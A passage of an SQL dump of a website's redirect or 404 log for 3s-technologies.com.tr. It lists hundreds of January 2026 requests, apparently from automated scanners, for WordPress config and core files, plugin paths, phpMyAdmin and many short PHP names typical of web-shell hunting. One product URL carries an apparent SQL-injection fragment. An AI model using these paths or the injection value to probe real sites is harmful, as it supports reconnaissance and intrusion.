00:00:00',301),(56122,'http://www.3s-technologies.com.tr/en/newsite/wp-admin/admin-header.php',NULL,'','',1,0,'2026-01-13 19:21:14','0000-00-00 00:00:00',301),(56123,'http://www.3s-technologies.com.tr/en/wp-includes/update.php',NULL,'','',1,0,'2026-01-13 19:21:15','0000-00-00 00:00:00',301),(56124,'http://www.3s-technologies.com.tr/en/wp-content/themes/autoloader.php',NULL,'','',1,0,'2026-01-13 19:21:16','0000-00-00 00:00:00',301),(56125,'http://www.3s-technologies.com.tr/en/wp-content/themes/r-and-t/functions.php',NULL,'','',1,0,'2026-01-13 19:21:17','0000-00-00 00:00:00',301),(56126,'http://www.3s-technologies.com.tr/en/wp-admin/includes/theme.php',NULL,'','',1,0,'2026-01-13 19:21:17','0000-00-00 00:00:00',301),(56127,'http://www.3s-technologies.com.tr/en/wp-blog-header.php',NULL,'','',1,0,'2026-01-13 19:21:18','0000-00-00 00:00:00',301),(56128,'http://www.3s-technologies.com.tr/en/wp-config.php',NULL,'','',1,0,'2026-01-13 19:21:20','0000-00-00 00:00:00',301),(56129,'http://www.3s-technologies.com.tr/en/wp-includes/template-loader.php',NULL,'','',1,0,'2026-01-13 19:21:20','0000-00-00 00:00:00',301),(56130,'http://www.3s-technologies.com.tr/en/themes/onepress/home.php',NULL,'','',1,0,'2026-01-13 19:21:21','0000-00-00 00:00:00',301),(56131,'http://www.3s-technologies.com.tr/en/themes/child/header.php',NULL,'','',1,0,'2026-01-13 19:21:22','0000-00-00 00:00:00',301),(56132,'http://www.3s-technologies.com.tr/en/themes/onepress/single.php',NULL,'','',1,0,'2026-01-13 19:21:23','0000-00-00 00:00:00',301),(56133,'http://www.3s-technologies.com.tr/en/themes/onepress/archive.php',NULL,'','',1,0,'2026-01-13 19:21:24','0000-00-00 00:00:00',301),(56134,'http://www.3s-technologies.com.tr/en/themes/onepress/page.php',NULL,'','',1,0,'2026-01-13 19:21:24','0000-00-00 00:00:00',301),(56135,'http://www.3s-technologies.com.tr/en/cloner/websocket.php',NULL,'','',1,0,'2026-01-13 19:21:25','0000-00-00 00:00:00',301),(56136,'http://www.3s-technologies.com.tr/en/mu-plugins/0-worker.php',NULL,'','',1,0,'2026-01-13 19:21:26','0000-00-00 00:00:00',301),(56137,'http://www.3s-technologies.com.tr/en/plugins/worker/init.php',NULL,'','',1,0,'2026-01-13 19:21:26','0000-00-00 00:00:00',301),(56138,'http://www.3s-technologies.com.tr/en/themes/onepress/sidebar.php',NULL,'','',1,0,'2026-01-13 19:21:27','0000-00-00 00:00:00',301),(56139,'http://www.3s-technologies.com.tr/en/wp-includes/wp-db.php',NULL,'','',1,0,'2026-01-13 19:21:29','0000-00-00 00:00:00',301),(56140,'http://www.3s-technologies.com.tr/en/wp-includes/class-wp-query.php',NULL,'','',1,0,'2026-01-13 19:21:30','0000-00-00 00:00:00',301),(56141,'http://www.3s-technologies.com.tr/en/abspathwp-includes/version.php',NULL,'','',1,0,'2026-01-13 19:21:30','0000-00-00 00:00:00',301),(56142,'http://www.3s-technologies.com.tr/en/wp-includes/class-wp-customize-widgets.php',NULL,'','',1,0,'2026-01-13 19:21:31','0000-00-00 00:00:00',301),(56143,'http://www.3s-technologies.com.tr/en/wp-content/themes/lisli_emi/header.php',NULL,'','',1,0,'2026-01-13 19:21:32','0000-00-00 00:00:00',301),(56144,'http://www.3s-technologies.com.tr/en/plugins/duplicator/uninstall.php',NULL,'','',1,0,'2026-01-13 19:21:33','0000-00-00 00:00:00',301),(56145,'http://www.3s-technologies.com.tr/en/wp-includes/class-wpdb.php',NULL,'','',1,0,'2026-01-13 19:21:33','0000-00-00 00:00:00',301),(56146,'http://www.3s-technologies.com.tr/en/wp-includes/canonical.php',NULL,'','',1,0,'2026-01-13 19:21:34','0000-00-00 00:00:00',301),(56147,'http://www.3s-technologies.com.tr/en/wp-content/plugins/ozh-click-counter/wp_ozh_clickcounter.php',NULL,'','',1,0,'2026-01-13 19:21:35','0000-00-00 00:00:00',301),(56148,'http://www.3s-technologies.com.tr/en/wp-includes/class-wp-hook.php',NULL,'','',1,0,'2026-01-13 19:21:36','0000-00-00 00:00:00',301),(56149,'http://www.3s-technologies.com.tr/en/wp-includes/plugin.php',NULL,'','',1,0,'2026-01-13 19:21:36','0000-00-00 00:00:00',301),(56150,'http://www.3s-technologies.com.tr/en/wp-includes/formatting.php',NULL,'','',1,0,'2026-01-13 19:21:37','0000-00-00 00:00:00',301),(56151,'http://www.3s-technologies.com.tr/en/wp-includes/post-template.php',NULL,'','',1,0,'2026-01-13 19:21:38','0000-00-00 00:00:00',301),(56152,'http://www.3s-technologies.com.tr/en/wp-content/plugins/search-filter/search-filter.php',NULL,'','',1,0,'2026-01-13 19:21:39','0000-00-00 00:00:00',301),(56153,'http://www.3s-technologies.com.tr/en/wp-includes/template.php',NULL,'','',1,0,'2026-01-13 19:21:39','0000-00-00 00:00:00',301),(56154,'http://www.3s-technologies.com.tr/en/wp-includes/general-template.php',NULL,'','',1,0,'2026-01-13 19:21:40','0000-00-00 00:00:00',301),(56155,'http://www.3s-technologies.com.tr/en/wp-content/plugins/w3-total-cache/pgcache_contentgrabber.php',NULL,'','',1,0,'2026-01-13 19:21:41','0000-00-00 00:00:00',301),(56156,'http://www.3s-technologies.com.tr/en/themes/flash/page.php',NULL,'','',1,0,'2026-01-13 19:21:42','0000-00-00 00:00:00',301),(56157,'http://www.3s-technologies.com.tr/en/themes/flash/header.php',NULL,'','',1,0,'2026-01-13 19:21:42','0000-00-00 00:00:00',301),(56158,'http://www.3s-technologies.com.tr/en/wer.php',NULL,'','',1,0,'2026-01-13 19:21:43','0000-00-00 00:00:00',301),(56159,'http://www.3s-technologies.com.tr/en/crouter.php',NULL,'','',1,0,'2026-01-13 19:21:44','0000-00-00 00:00:00',301),(56160,'http://www.3s-technologies.com.tr/en/sites/default/composer.php',NULL,'','',1,0,'2026-01-13 19:21:45','0000-00-00 00:00:00',301),(56161,'http://www.3s-technologies.com.tr/en/copyright.php',NULL,'','',1,0,'2026-01-13 19:21:45','0000-00-00 00:00:00',301),(56162,'http://www.3s-technologies.com.tr/en/sites/default/settingsm.php',NULL,'','',1,0,'2026-01-13 19:21:46','0000-00-00 00:00:00',301),(56163,'http://www.3s-technologies.com.tr/en/wp-admin/includes/class-wp-upgrader-skin.php',NULL,'','',1,0,'2026-01-13 19:21:47','0000-00-00 00:00:00',301),(56164,'http://www.3s-technologies.com.tr/en/lanceros.es/wp-settings.php',NULL,'','',1,0,'2026-01-13 19:21:48','0000-00-00 00:00:00',301),(56165,'http://www.3s-technologies.com.tr/en/lanceros.es/wp-config.php',NULL,'','',1,0,'2026-01-13 19:21:49','0000-00-00 00:00:00',301),(56166,'http://www.3s-technologies.com.tr/en/abspathwp-includes/load.php',NULL,'','',1,0,'2026-01-13 19:21:49','0000-00-00 00:00:00',301),(56167,'http://www.3s-technologies.com.tr/en/lanceros.es/wp-admin/includes/update-core.php',NULL,'','',1,0,'2026-01-13 19:21:50','0000-00-00 00:00:00',301),(56168,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/index.php',NULL,'','',1,0,'2026-01-13 19:21:51','0000-00-00 00:00:00',301),(56169,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/sidebar.php',NULL,'','',1,0,'2026-01-13 19:21:52','0000-00-00 00:00:00',301),(56170,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/page.php',NULL,'','',1,0,'2026-01-13 19:21:52','0000-00-00 00:00:00',301),(56171,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/single.php',NULL,'','',1,0,'2026-01-13 19:21:53','0000-00-00 00:00:00',301),(56172,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/author.php',NULL,'','',1,0,'2026-01-13 19:21:54','0000-00-00 00:00:00',301),(56173,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/404.php',NULL,'','',1,0,'2026-01-13 19:21:55','0000-00-00 00:00:00',301),(56174,'http://www.3s-technologies.com.tr/en/themes/twentyfourteen/tag.php',NULL,'','',1,0,'2026-01-13 19:21:56','0000-00-00 00:00:00',301),(56175,'http://www.3s-technologies.com.tr/en/lanceros.es/wp-includes/class-wp-xmlrpc-server.php',NULL,'','',1,0,'2026-01-13 19:21:56','0000-00-00 00:00:00',301),(56176,'http://www.3s-technologies.com.tr/en/admin-ajax.php',NULL,'','',1,0,'2026-01-13 19:21:57','0000-00-00 00:00:00',301),(56177,'http://www.3s-technologies.com.tr/en/themes.php',NULL,'','',1,0,'2026-01-13 19:21:58','0000-00-00 00:00:00',301),(56178,'http://www.3s-technologies.com.tr/en/profile.php',NULL,'','',1,0,'2026-01-13 19:21:59','0000-00-00 00:00:00',301),(56179,'http://www.3s-technologies.com.tr/en/wp-content/plugins/php-compatibility-checker/wpengine-phpcompat.php',NULL,'','',1,0,'2026-01-13 19:22:00','0000-00-00 00:00:00',301),(56180,'http://www.3s-technologies.com.tr/en/usr/share/phpmyadmin/server_import.php',NULL,'','',1,0,'2026-01-13 19:22:01','0000-00-00 00:00:00',301),(56181,'http://www.3s-technologies.com.tr/en/wp-admin/plugins.php',NULL,'','',1,0,'2026-01-13 19:22:01','0000-00-00 00:00:00',301),(56182,'http://www.3s-technologies.com.tr/en/bocabravaproperties.com/wp-includes/compat.php',NULL,'','',1,0,'2026-01-13 19:22:02','0000-00-00 00:00:00',301),(56183,'http://www.3s-technologies.com.tr/en/ability-tw.com/wp-settings.php',NULL,'','',1,0,'2026-01-13 19:22:03','0000-00-00 00:00:00',301),(56184,'http://www.3s-technologies.com.tr/en/w/index.php',NULL,'','',1,0,'2026-01-13 19:22:04','0000-00-00 00:00:00',301),(56185,'http://www.3s-technologies.com.tr/en/w/content/tracking.php',NULL,'','',1,0,'2026-01-13 19:22:05','0000-00-00 00:00:00',301),(56186,'http://www.3s-technologies.com.tr/en/w/app/core/assist.php',NULL,'','',1,0,'2026-01-13 19:22:05','0000-00-00 00:00:00',301),(56187,'http://www.3s-technologies.com.tr/en/w/app/core/basic.php',NULL,'','',1,0,'2026-01-13 19:22:06','0000-00-00 00:00:00',301),(56188,'http://www.3s-technologies.com.tr/en/w/app/core/full.php',NULL,'','',1,0,'2026-01-13 19:22:07','0000-00-00 00:00:00',301),(56189,'http://www.3s-technologies.com.tr/en/w/app/core/extensions.php',NULL,'','',1,0,'2026-01-13 19:22:08','0000-00-00 00:00:00',301),(56190,'http://www.3s-technologies.com.tr/en/w/corrected.php',NULL,'','',1,0,'2026-01-13 19:22:09','0000-00-00 00:00:00',301),(56191,'http://mail.3s-technologies.com.tr/tr/ver.php',NULL,'','',3,0,'2026-01-15 17:59:04','0000-00-00 00:00:00',301),(56192,'http://mail.3s-technologies.com.tr/tr/ultra.php',NULL,'','',2,0,'2026-01-15 17:59:05','0000-00-00 00:00:00',301),(56193,'http://mail.3s-technologies.com.tr/tr/pro.php',NULL,'','',2,0,'2026-01-15 17:59:06','0000-00-00 00:00:00',301),(56194,'http://mail.3s-technologies.com.tr/tr/data.php',NULL,'','',6,0,'2026-01-15 17:59:08','0000-00-00 00:00:00',301),(56195,'http://mail.3s-technologies.com.tr/tr/check.php',NULL,'','',2,0,'2026-01-15 17:59:15','0000-00-00 00:00:00',301),(56196,'http://mail.3s-technologies.com.tr/tr/wp-header-json.php',NULL,'','',2,0,'2026-01-15 17:59:16','0000-00-00 00:00:00',301),(56197,'http://mail.3s-technologies.com.tr/tr/file56.php',NULL,'','',2,0,'2026-01-15 17:59:21','0000-00-00 00:00:00',301),(56198,'http://mail.3s-technologies.com.tr/tr/990.php',NULL,'','',2,0,'2026-01-15 17:59:22','0000-00-00 00:00:00',301),(56199,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2026-01-15 22:57:07','0000-00-00 00:00:00',301),(56200,'http://3s-technologies.com.tr/tr/bitrix/templates/.default/lang/en/page_templates/.contents.php',NULL,'','',1,0,'2026-01-16 09:58:44','0000-00-00 00:00:00',301),(56201,'http://3s-technologies.com.tr/tr/update/bibil.php',NULL,'','',2,0,'2026-01-17 00:58:24','0000-00-00 00:00:00',301),(56202,'http://3s-technologies.com.tr/tr/test/wop.php',NULL,'','',2,0,'2026-01-17 00:58:26','0000-00-00 00:00:00',301),(56203,'http://3s-technologies.com.tr/tr/update/wpupex.php',NULL,'','',13,0,'2026-01-17 00:58:26','0000-00-00 00:00:00',301),(56204,'http://3s-technologies.com.tr/tr/per.php',NULL,'','',2,0,'2026-01-17 00:58:28','0000-00-00 00:00:00',301),(56205,'http://3s-technologies.com.tr/tr/ioa.php',NULL,'','',2,0,'2026-01-17 00:58:29','0000-00-00 00:00:00',301),(56206,'http://3s-technologies.com.tr/tr/sww.php',NULL,'','',2,0,'2026-01-17 00:58:32','0000-00-00 00:00:00',301),(56207,'http://3s-technologies.com.tr/tr/oga.php',NULL,'','',2,0,'2026-01-17 00:58:34','0000-00-00 00:00:00',301),(56208,'http://3s-technologies.com.tr/tr/mt/byp.php',NULL,'','',2,0,'2026-01-17 00:58:36','0000-00-00 00:00:00',301),(56209,'http://3s-technologies.com.tr/tr/wp-admin/acme.php',NULL,'','',2,0,'2026-01-17 00:58:39','0000-00-00 00:00:00',301),(56210,'http://3s-technologies.com.tr/tr/sde.php',NULL,'','',17,0,'2026-01-17 00:58:42','0000-00-00 00:00:00',301),(56211,'http://3s-technologies.com.tr/tr/zjggu.php',NULL,'','',2,0,'2026-01-17 00:58:44','0000-00-00 00:00:00',301),(56212,'http://3s-technologies.com.tr/tr/assets/js/wp-session.php',NULL,'','',2,0,'2026-01-17 00:58:45','0000-00-00 00:00:00',301),(56213,'http://3s-technologies.com.tr/tr/wsrer.php',NULL,'','',2,0,'2026-01-17 00:58:50','0000-00-00 00:00:00',301),(56214,'http://3s-technologies.com.tr/tr/sol.php',NULL,'','',2,0,'2026-01-17 00:58:52','0000-00-00 00:00:00',301),(56215,'http://3s-technologies.com.tr/tr/tra.php',NULL,'','',2,0,'2026-01-17 00:58:56','0000-00-00 00:00:00',301),(56216,'http://3s-technologies.com.tr/tr/cms/niz.php',NULL,'','',2,0,'2026-01-17 00:58:58','0000-00-00 00:00:00',301),(56217,'http://3s-technologies.com.tr/tr/.trash7309/f',NULL,'','',13,0,'2026-01-17 00:59:00','0000-00-00 00:00:00',301),(56218,'http://3s-technologies.com.tr/tr/tts.php',NULL,'','',2,0,'2026-01-17 00:59:01','0000-00-00 00:00:00',301),(56219,'http://3s-technologies.com.tr/tr/sue.php',NULL,'','',2,0,'2026-01-17 00:59:02','0000-00-00 00:00:00',301),(56220,'http://3s-technologies.com.tr/tr/wp-includes/ipv6.php',NULL,'','',4,0,'2026-01-17 00:59:06','0000-00-00 00:00:00',301),(56221,'http://3s-technologies.com.tr/tr/opss.php',NULL,'','',2,0,'2026-01-17 00:59:07','0000-00-00 00:00:00',301),(56222,'http://3s-technologies.com.tr/tr/images/fk2e3',NULL,'','',13,0,'2026-01-17 00:59:08','0000-00-00 00:00:00',301),(56223,'http://3s-technologies.com.tr/tr/nng.php',NULL,'','',2,0,'2026-01-17 00:59:10','0000-00-00 00:00:00',301),(56224,'http://3s-technologies.com.tr/tr/blo.php',NULL,'','',2,0,'2026-01-17 00:59:10','0000-00-00 00:00:00',301),(56225,'http://3s-technologies.com.tr/tr/wordpress/x',NULL,'','',13,0,'2026-01-17 00:59:11','0000-00-00 00:00:00',301),(56226,'http://3s-technologies.com.tr/tr/ucpfr.php',NULL,'','',2,0,'2026-01-17 00:59:13','0000-00-00 00:00:00',301),(56227,'http://3s-technologies.com.tr/tr/ttw.php',NULL,'','',2,0,'2026-01-17 00:59:19','0000-00-00 00:00:00',301),(56228,'http://3s-technologies.com.tr/tr/ssk.php',NULL,'','',2,0,'2026-01-17 00:59:20','0000-00-00 00:00:00',301),(56229,'http://3s-technologies.com.tr/tr/first/function.php',NULL,'','',2,0,'2026-01-17 00:59:22','0000-00-00 00:00:00',301),(56230,'http://3s-technologies.com.tr/tr/wwo.php',NULL,'','',2,0,'2026-01-17 00:59:22','0000-00-00 00:00:00',301),(56231,'http://3s-technologies.com.tr/tr/nhd.php',NULL,'','',2,0,'2026-01-17 00:59:23','0000-00-00 00:00:00',301),(56232,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/index.php',NULL,'','',2,0,'2026-01-17 00:59:24','0000-00-00 00:00:00',301),(56233,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-dependency-get.php',NULL,'','',2,0,'2026-01-17 00:59:25','0000-00-00 00:00:00',301),(56234,'http://3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/d/d/d/g',NULL,'','',2,0,'2026-01-17 00:59:28','0000-00-00 00:00:00',301),(56235,'http://3s-technologies.com.tr/tr/.trash7309/dd',NULL,'','',13,0,'2026-01-17 00:59:30','0000-00-00 00:00:00',301),(56236,'http://3s-technologies.com.tr/tr/wp-content/del.php',NULL,'','',2,0,'2026-01-17 00:59:33','0000-00-00 00:00:00',301),(56237,'http://3s-technologies.com.tr/tr/niu.php',NULL,'','',2,0,'2026-01-17 00:59:34','0000-00-00 00:00:00',301),(56238,'http://3s-technologies.com.tr/tr/scripts/wpup.php',NULL,'','',5,0,'2026-01-17 00:59:37','0000-00-00 00:00:00',301),(56239,'http://3s-technologies.com.tr/tr/opsqt.php',NULL,'','',2,0,'2026-01-17 00:59:38','0000-00-00 00:00:00',301),(56240,'http://3s-technologies.com.tr/tr/sog.php',NULL,'','',2,0,'2026-01-17 00:59:39','0000-00-00 00:00:00',301),(56241,'http://3s-technologies.com.tr/tr/wd/shh.php',NULL,'','',2,0,'2026-01-17 00:59:39','0000-00-00 00:00:00',301),(56242,'http://3s-technologies.com.tr/tr/myy.php',NULL,'','',7,0,'2026-01-17 00:59:41','0000-00-00 00:00:00',301),(56243,'http://3s-technologies.com.tr/tr/cgi-bin/wle.php',NULL,'','',2,0,'2026-01-17 00:59:44','0000-00-00 00:00:00',301),(56244,'http://3s-technologies.com.tr/tr/yxijx.php',NULL,'','',2,0,'2026-01-17 00:59:45','0000-00-00 00:00:00',301),(56245,'http://3s-technologies.com.tr/tr/buv.php',NULL,'','',2,0,'2026-01-17 00:59:47','0000-00-00 00:00:00',301),(56246,'http://3s-technologies.com.tr/tr/los.php',NULL,'','',2,0,'2026-01-17 00:59:49','0000-00-00 00:00:00',301),(56247,'http://3s-technologies.com.tr/tr/zugvi.php',NULL,'','',2,0,'2026-01-17 00:59:50','0000-00-00 00:00:00',301),(56248,'http://3s-technologies.com.tr/tr/bah.php',NULL,'','',2,0,'2026-01-17 00:59:51','0000-00-00 00:00:00',301),(56249,'http://3s-technologies.com.tr/tr/dlvqo.php',NULL,'','',2,0,'2026-01-17 00:59:52','0000-00-00 00:00:00',301),(56250,'http://3s-technologies.com.tr/tr/sst.php',NULL,'','',4,0,'2026-01-17 00:59:53','0000-00-00 00:00:00',301),(56251,'http://3s-technologies.com.tr/tr/author-template-less.php',NULL,'','',2,0,'2026-01-17 00:59:54','0000-00-00 00:00:00',301),(56252,'http://3s-technologies.com.tr/tr/sft.php',NULL,'','',2,0,'2026-01-17 00:59:54','0000-00-00 00:00:00',301),(56253,'http://3s-technologies.com.tr/tr/lddxs.php',NULL,'','',2,0,'2026-01-17 00:59:55','0000-00-00 00:00:00',301),(56254,'http://3s-technologies.com.tr/tr/zwlsv.php',NULL,'','',2,0,'2026-01-17 00:59:57','0000-00-00 00:00:00',301),(56255,'http://3s-technologies.com.tr/tr/apsarasarts/okk.php',NULL,'','',13,0,'2026-01-17 01:00:07','0000-00-00 00:00:00',301),(56256,'http://3s-technologies.com.tr/tr/backup/db.php',NULL,'','',2,0,'2026-01-17 01:00:09','0000-00-00 00:00:00',301),(56257,'http://3s-technologies.com.tr/tr/seni_budaya/admin',NULL,'','',2,0,'2026-01-17 01:00:09','0000-00-00 00:00:00',301),(56258,'http://mail.3s-technologies.com.tr/tr/update/bibil.php',NULL,'','',1,0,'2026-01-17 18:50:17','0000-00-00 00:00:00',301),(56259,'http://mail.3s-technologies.com.tr/tr/wp-conf.php',NULL,'','',7,0,'2026-01-17 18:50:18','0000-00-00 00:00:00',301),(56260,'http://mail.3s-technologies.com.tr/tr/test/wop.php',NULL,'','',1,0,'2026-01-17 18:50:19','0000-00-00 00:00:00',301),(56261,'http://mail.3s-technologies.com.tr/tr/wp-miiss.php.php',NULL,'','',5,0,'2026-01-17 18:50:21','0000-00-00 00:00:00',301),(56262,'http://mail.3s-technologies.com.tr/tr/per.php',NULL,'','',1,0,'2026-01-17 18:50:21','0000-00-00 00:00:00',301),(56263,'http://mail.3s-technologies.com.tr/tr/uploads/upload.php',NULL,'','',1,0,'2026-01-17 18:50:22','0000-00-00 00:00:00',301),(56264,'http://mail.3s-technologies.com.tr/tr/ioa.php',NULL,'','',1,0,'2026-01-17 18:50:23','0000-00-00 00:00:00',301),(56265,'http://mail.3s-technologies.com.tr/tr/sww.php',NULL,'','',1,0,'2026-01-17 18:50:25','0000-00-00 00:00:00',301),(56266,'http://mail.3s-technologies.com.tr/tr/tua.php',NULL,'','',1,0,'2026-01-17 18:50:26','0000-00-00 00:00:00',301),(56267,'http://mail.3s-technologies.com.tr/tr/wordpress/wp-admin/about.php',NULL,'','',1,0,'2026-01-17 18:50:28','0000-00-00 00:00:00',301),(56268,'http://mail.3s-technologies.com.tr/tr/mt/byp.php',NULL,'','',1,0,'2026-01-17 18:50:30','0000-00-00 00:00:00',301),(56269,'http://mail.3s-technologies.com.tr/tr/wp-admin/acme.php',NULL,'','',2,0,'2026-01-17 18:50:33','0000-00-00 00:00:00',301),(56270,'http://mail.3s-technologies.com.tr/tr/sde.php',NULL,'','',4,0,'2026-01-17 18:50:37','0000-00-00 00:00:00',301),(56271,'http://mail.3s-technologies.com.tr/tr/spip.php',NULL,'','',3,0,'2026-01-17 18:50:38','0000-00-00 00:00:00',301),(56272,'http://mail.3s-technologies.com.tr/tr/zjggu.php',NULL,'','',1,0,'2026-01-17 18:50:39','0000-00-00 00:00:00',301),(56273,'http://mail.3s-technologies.com.tr/tr/assets/js/wp-session.php',NULL,'','',2,0,'2026-01-17 18:50:40','0000-00-00 00:00:00',301),(56274,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/index.php',NULL,'','',17,0,'2026-01-17 18:50:41','0000-00-00 00:00:00',301),(56275,'http://mail.3s-technologies.com.tr/tr/wsrer.php',NULL,'','',1,0,'2026-01-17 18:50:42','0000-00-00 00:00:00',301),(56276,'http://mail.3s-technologies.com.tr/tr/msg.php',NULL,'','',1,0,'2026-01-17 18:50:48','0000-00-00 00:00:00',301),(56277,'http://mail.3s-technologies.com.tr/tr/tra.php',NULL,'','',1,0,'2026-01-17 18:50:48','0000-00-00 00:00:00',301),(56278,'http://mail.3s-technologies.com.tr/tr/.trash7309/f',NULL,'','',5,0,'2026-01-17 18:50:53','0000-00-00 00:00:00',301),(56279,'http://mail.3s-technologies.com.tr/tr/tts.php',NULL,'','',1,0,'2026-01-17 18:50:54','0000-00-00 00:00:00',301),(56280,'http://mail.3s-technologies.com.tr/tr/sue.php',NULL,'','',1,0,'2026-01-17 18:50:55','0000-00-00 00:00:00',301),(56281,'http://mail.3s-technologies.com.tr/tr/wp-admin/fw.php',NULL,'','',1,0,'2026-01-17 18:50:58','0000-00-00 00:00:00',301),(56282,'http://mail.3s-technologies.com.tr/tr/wp-includes/ipv6.php',NULL,'','',2,0,'2026-01-17 18:50:59','0000-00-00 00:00:00',301),(56283,'http://mail.3s-technologies.com.tr/tr/images/fk2e3',NULL,'','',5,0,'2026-01-17 18:51:02','0000-00-00 00:00:00',301),(56284,'http://mail.3s-technologies.com.tr/tr/nng.php',NULL,'','',1,0,'2026-01-17 18:51:03','0000-00-00 00:00:00',301),(56285,'http://mail.3s-technologies.com.tr/tr/blo.php',NULL,'','',1,0,'2026-01-17 18:51:04','0000-00-00 00:00:00',301),(56286,'http://mail.3s-technologies.com.tr/tr/wordpress/x',NULL,'','',5,0,'2026-01-17 18:51:04','0000-00-00 00:00:00',301),(56287,'http://mail.3s-technologies.com.tr/tr/x/index.php',NULL,'','',2,0,'2026-01-17 18:51:05','0000-00-00 00:00:00',301),(56288,'http://mail.3s-technologies.com.tr/tr/ucpfr.php',NULL,'','',1,0,'2026-01-17 18:51:07','0000-00-00 00:00:00',301),(56289,'http://mail.3s-technologies.com.tr/tr/images/g3.php',NULL,'','',2,0,'2026-01-17 18:51:09','0000-00-00 00:00:00',301),(56290,'http://mail.3s-technologies.com.tr/tr/cachex.php',NULL,'','',1,0,'2026-01-17 18:51:11','0000-00-00 00:00:00',301),(56291,'http://mail.3s-technologies.com.tr/tr/first/function.php',NULL,'','',1,0,'2026-01-17 18:51:15','0000-00-00 00:00:00',301),(56292,'http://mail.3s-technologies.com.tr/tr/wwo.php',NULL,'','',1,0,'2026-01-17 18:51:16','0000-00-00 00:00:00',301),(56293,'http://mail.3s-technologies.com.tr/tr/nhd.php',NULL,'','',1,0,'2026-01-17 18:51:17','0000-00-00 00:00:00',301),(56294,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/tinymce/index.php',NULL,'','',1,0,'2026-01-17 18:51:18','0000-00-00 00:00:00',301),(56295,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-dependency-get.php',NULL,'','',2,0,'2026-01-17 18:51:19','0000-00-00 00:00:00',301),(56296,'http://mail.3s-technologies.com.tr/tr/wp-admin/zwso.php',NULL,'','',1,0,'2026-01-17 18:51:21','0000-00-00 00:00:00',301),(56297,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/d/d/d/g',NULL,'','',1,0,'2026-01-17 18:51:22','0000-00-00 00:00:00',301),(56298,'http://mail.3s-technologies.com.tr/tr/.trash7309/dd',NULL,'','',5,0,'2026-01-17 18:51:25','0000-00-00 00:00:00',301),(56299,'http://mail.3s-technologies.com.tr/tr/wp-content/del.php',NULL,'','',1,0,'2026-01-17 18:51:28','0000-00-00 00:00:00',301),(56300,'http://mail.3s-technologies.com.tr/tr/niu.php',NULL,'','',1,0,'2026-01-17 18:51:29','0000-00-00 00:00:00',301),(56301,'http://mail.3s-technologies.com.tr/tr/ink.php',NULL,'','',1,0,'2026-01-17 18:51:31','0000-00-00 00:00:00',301),(56302,'http://mail.3s-technologies.com.tr/tr/scripts/wpup.php',NULL,'','',2,0,'2026-01-17 18:51:32','0000-00-00 00:00:00',301),(56303,'http://mail.3s-technologies.com.tr/tr/opsqt.php',NULL,'','',1,0,'2026-01-17 18:51:34','0000-00-00 00:00:00',301),(56304,'http://mail.3s-technologies.com.tr/tr/sog.php',NULL,'','',1,0,'2026-01-17 18:51:34','0000-00-00 00:00:00',301),(56305,'http://mail.3s-technologies.com.tr/tr/wd/shh.php',NULL,'','',1,0,'2026-01-17 18:51:35','0000-00-00 00:00:00',301),(56306,'http://mail.3s-technologies.com.tr/tr/myy.php',NULL,'','',3,0,'2026-01-17 18:51:37','0000-00-00 00:00:00',301),(56307,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-patterns',NULL,'','',5,0,'2026-01-17 18:51:38','0000-00-00 00:00:00',301),(56308,'http://mail.3s-technologies.com.tr/tr/index/data.php',NULL,'','',1,0,'2026-01-17 18:51:39','0000-00-00 00:00:00',301),(56309,'http://mail.3s-technologies.com.tr/tr/wp-includes/wp-widgets.php',NULL,'','',1,0,'2026-01-17 18:51:39','0000-00-00 00:00:00',301),(56310,'http://mail.3s-technologies.com.tr/tr/cgi-bin/wle.php',NULL,'','',1,0,'2026-01-17 18:51:40','0000-00-00 00:00:00',301),(56311,'http://mail.3s-technologies.com.tr/tr/yxijx.php',NULL,'','',1,0,'2026-01-17 18:51:41','0000-00-00 00:00:00',301),(56312,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/deeto/login.php',NULL,'','',7,0,'2026-01-17 18:51:42','0000-00-00 00:00:00',301),(56313,'http://mail.3s-technologies.com.tr/tr/buv.php',NULL,'','',1,0,'2026-01-17 18:51:42','0000-00-00 00:00:00',301),(56314,'http://mail.3s-technologies.com.tr/tr/hum.php',NULL,'','',1,0,'2026-01-17 18:51:43','0000-00-00 00:00:00',301),(56315,'http://mail.3s-technologies.com.tr/tr/los.php',NULL,'','',1,0,'2026-01-17 18:51:45','0000-00-00 00:00:00',301),(56316,'http://mail.3s-technologies.com.tr/tr/zugvi.php',NULL,'','',1,0,'2026-01-17 18:51:46','0000-00-00 00:00:00',301),(56317,'http://mail.3s-technologies.com.tr/tr/bah.php',NULL,'','',1,0,'2026-01-17 18:51:47','0000-00-00 00:00:00',301),(56318,'http://mail.3s-technologies.com.tr/tr/dlvqo.php',NULL,'','',1,0,'2026-01-17 18:51:47','0000-00-00 00:00:00',301),(56319,'http://mail.3s-technologies.com.tr/tr/sst.php',NULL,'','',2,0,'2026-01-17 18:51:49','0000-00-00 00:00:00',301),(56320,'http://mail.3s-technologies.com.tr/tr/author-template-less.php',NULL,'','',1,0,'2026-01-17 18:51:49','0000-00-00 00:00:00',301),(56321,'http://mail.3s-technologies.com.tr/tr/sft.php',NULL,'','',1,0,'2026-01-17 18:51:50','0000-00-00 00:00:00',301),(56322,'http://mail.3s-technologies.com.tr/tr/lddxs.php',NULL,'','',1,0,'2026-01-17 18:51:51','0000-00-00 00:00:00',301),(56323,'http://mail.3s-technologies.com.tr/tr/zwlsv.php',NULL,'','',1,0,'2026-01-17 18:51:52','0000-00-00 00:00:00',301),(56324,'http://mail.3s-technologies.com.tr/tr/e/data.php',NULL,'','',2,0,'2026-01-17 18:51:55','0000-00-00 